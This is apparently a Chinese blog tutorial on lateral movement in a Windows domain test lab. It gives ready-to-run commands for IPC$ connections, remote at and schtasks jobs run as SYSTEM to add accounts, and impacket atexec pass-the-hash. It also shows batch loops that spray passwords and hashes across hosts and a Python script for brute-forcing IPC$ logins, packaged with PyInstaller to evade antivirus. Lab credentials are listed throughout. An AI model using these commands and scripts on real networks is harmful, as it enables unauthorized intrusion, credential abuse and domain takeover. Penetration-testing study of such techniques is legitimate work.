内网安全-域横向批量at&schtasks&impacket

目录

0x01 横向渗透明文传递

1.1 渗透流程

1.2 IPC技术

1.3  [at] & [schtasks]

1.3.1 假设已经找到DC的用户名密码(具体后面再详细讲),由于域控DC是Win2008R2(< Windows2012),可以使用at命令

1.3.2 如果目标计算机>=Windows2012,需要使用schtasks命令

0x02  横向渗透明文HASH传递atexec-impacket

0x03  横向渗透明文HASH传递批量利用-综合

3.1 websever登录,运行mimikatz,得到用户名密码

3.2 用微软自带命令探测网段存活主机

 3.3 批量检测IP对应明文连接

3.4 在jack-pc上运行mimikatz,获取到另一个账户密码

 3.5 接下来,可以使用新密码继续批量检测IP对应明文

(四)横向渗透明文HASH传递批量利用-升级版

脚本(最好写成多线程的)

简单演示


环境

2008 r2 webserver 域内web服务器
本地管理员账号密码: .\administraotr:admin!@#45
当前机器域用户密码: god\webadmin:admin!@#45
 
2003 x86 fileserver 域内文件服务器
本地管理员账号密码:administrator:admin
当前机器域用户密码: god\fileadmin:Admin12345
 
2008 r2 x64 dc god.org 主域控机器
域管账号密码: God\administrator:Admin12345
 
2012 sqlserver 域内数据库服务器
本地管理员账号密码:.\administrator:admin!@#45
当前机器域用户密码:god\dbadmin:admin!@#45
 
w7 x64 mary-pc 域内个人机
本地管理员账号密码:.\mary:admin
当前机器域用户密码:god\mary:admin!@#45
 
w8.1 x64 jack-pc 域内个人机
本地管理员账号密码:.\jack:admin
当前机器域用户密码:god\boss:Admin12345

0x01 横向渗透明文传递


在拿下一台内网主机,通过本地信息搜集收集用户凭据等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令

1.1 渗透流程

获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令

1.2 IPC技术

IPC( Internet Process Connection)是共享“命名管道”的资管,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相关的权限,在远程管理计算机和查看计算机的共享资源时使用

连接命令

net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\                # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat  # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del  # 删除文件
net use \\xx.xx.xx.xx\ipc$ \del     # 删除IPC
net view xx.xx.xx.xx                # 查看对方共享

 建立IPC常见的错误代码

5:拒绝访问,可能是使用的不是管理员权限,需要先提升权限
51:网络问题,windoows无法找到网络路径
53:找不到网站路径,可能是IP地址错误,目标未开机,目标Lanmanserver服务未启动、有防火墙等问题
67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$
1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
1326:账号密码错误
1792:目标NetLogon服务未启动,连接域控常常会出现此情况
2242:用户密码过期,目标有账号策略,强制定期更改密码

建立IPC失败的原因

目标系统不是NT或以上的操作系统
对方没有打开IPC$共享
对方未开启139,445端口,或者被防火墙屏蔽
输出命令,账号密码有错误

1.3  [at] & [schtasks]

#at < Windows2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立ipc连接
copy add.bat \192.168.3.21\c$  #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat    #添加计划任务
 
schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立ipc连接
copy add.bat \\192.168.3.32\c$ #复制文件到其C盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser任务对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行adduser任务
schtasks /delete /s 192.168.3.21 /tn adduser /f#删除adduser任务
  • 获取到DC的IP地址。执行以下两个命令时,需要域用户登录,而不是本地用户登录

 

1.3.1 假设已经找到DC的用户名密码(具体后面再详细讲),由于域控DC是Win2008R2(< Windows2012),可以使用at命令


net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立ipc连接
copy add.bat \192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

 具体操作

 

  • 一段时候后,xiaodi用户就自动添加成功了

1.3.2 如果目标计算机>=Windows2012,需要使用schtasks命令


  • 比如前期信息收集得到了sqlserver的用户名密码,SqlServer是window2012系统

  • 如下图,当使用域用户登录时,copy是失败的,原因是权限不够,应该使用本地用户登录

 

  • 使用本地用户登录,执行如下命令
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立ipc连接
copy add.bat \\192.168.3.32\c$ #复制文件到其C盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser任务对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行adduser任务
schtasks /delete /s 192.168.3.21 /tn adduser /f#删除adduser任务
  • 等待一段时间,成功添加新用户
net user 查看用户中是否多了一个xiaodi
net user xiaodi 查看xiaodi账户创建时间是否为刚才计划任务的时间
net user xiaodi /del 不需要了的话可以删除

0x02  横向渗透明文HASH传递atexec-impacket


atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

执行命令,直接提权

 查看权限

0x03  横向渗透明文HASH传递批量利用-综合


FOR /F %%i in (ips.txt) do net use \%%i\ipc$ "admin!@#45" /user:administrator #批量检测IP对应明文连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测HASH对应IP回显版

3.1 websever登录,运行mimikatz,得到用户名密码


内网安全-域环境&工作组&局域网探针方案__Cyber的博客-CSDN博客

 

3.2 用微软自带命令探测网段存活主机


for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL =" 自带内部命令(推荐使用)

 3.3 批量检测IP对应明文连接


FOR /F %%i in (ips.txt) do net use \%%i\ipc$ "admin!@#45" /user:administrator #批量检测IP对应明文连接

发现网段内另一台主机192.168.3.29(jack-pc)与webserver用了相同的账户密码,并且可以直接提权到system权限。

3.4 在jack-pc上运行mimikatz,获取到另一个账户密码


 3.5 接下来,可以使用新密码继续批量检测IP对应明文


FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版

执行at_ip.bat,发现192,.168.3.21也用了该密码,而它正好就是域控!

  •  或者可以采用另一种方法,由于此时我们已经拿到了2个真实的账号密码,可以写一个字典表,直接去探测域控。
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测HASH对应IP回显版

执行at_ip.bat,找到了域控192,.168.3.21的密码!直接提权!

当然,这是我们测试环境,实战中一般没这么快,至少需要很多轮的信息收集,才能逐渐靠近域控

(四)横向渗透明文HASH传递批量利用-升级版


前期除了收集明文密码HASH等,还收集了用户名,用户名配合密码字典能拿到flag

net use \192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin

在3中都是批处理命令,只能遍历一个变量,如果想要遍历多个变量,比如IP、用户名、密码等,可以写python脚本,免杀,使用Pyinstaller打包成exe文件,上传到目标机器运行。

脚本(最好写成多线程的)

import os,time
ips={
   '192.168.3.21',
   '192.168.3.25',
   '192.168.3.29',
   '192.168.3.30',
   '192.168.3.31',
   '192.168.3.33'
}
 
users={
   'Administrator',
   'boss',
   'dbadmin',
   'fileadmin',
   'mack',
   'mary',
   'vpnadm',
   'webadmin'
}
passs={
   'admin',
   'admin!@#45',
   'Admin12345'
}
 
for ip in ips:
   for user in users:
       for mima in passs:
           exec="net use \"+ "\"+ip+'\ipc$ '+mima+' /user:god\'+user
           print('--->'+exec+'<---')
           os.system(exec)
           time.sleep(1)

编译

pip install pyinstaller
pyinstaller -F fuck_neiwang_001.py 生成可执行EXE

简单演示

1、首先,查看网络连接,此时结果是空的,没有连接;然后运行exe文件,结束后再次查看网络连接,发现连接上了5台主机

2、接下来,拷贝执行文件到目标主机,执行at或者schtasks命令创建任务即可

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
IPC(Inter-Process Communication)是进程间通信的一种机制,用于不同进程之间的数据交换和通信。它可以在同一台计算机上的不同进程之间进行通信,也可以在不同计算机上的进程之间进行通信。 Psexec是一款Windows系统下的命令行工具,它可以在远程计算机上执行命令或程序。通过Psexec,管理员可以在本地计算机上远程启动一个命令行窗口,并在远程计算机上执行命令或程序。 WMI(Windows Management Instrumentation)是一种用于管理和监控Windows操作系统的技术。它提供了一组API和服务,用于获取和设置操作系统的各种信息,包括硬件信息、软件信息、系统配置等。通过WMI,管理员可以通过编程方式管理和监控远程计算机。 Schtasks是Windows操作系统中的一个命令行工具,用于创建、修改、删除和查询计划任务。计划任务是指在指定的时间或事件发生时自动执行的任务。通过Schtasks,管理员可以通过命令行方式管理计划任务。 AT(Scheduled Task)是Windows操作系统中的一个命令行工具,用于创建和管理计划任务。与Schtasks类似,AT也可以用于在指定的时间或事件发生时自动执行任务。 SC(Service Control)是Windows操作系统中的一个命令行工具,用于管理Windows服务。通过SC,管理员可以启动、停止、暂停、继续、查询和修改Windows服务的状态和配置。 WINRM(Windows Remote Management)是一种用于远程管理Windows系统的协议和服务。它提供了一组API和服务,用于远程执行命令、获取和设置系统信息、配置和管理Windows服务等。通过WINRM,管理员可以通过网络远程管理和监控Windows系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值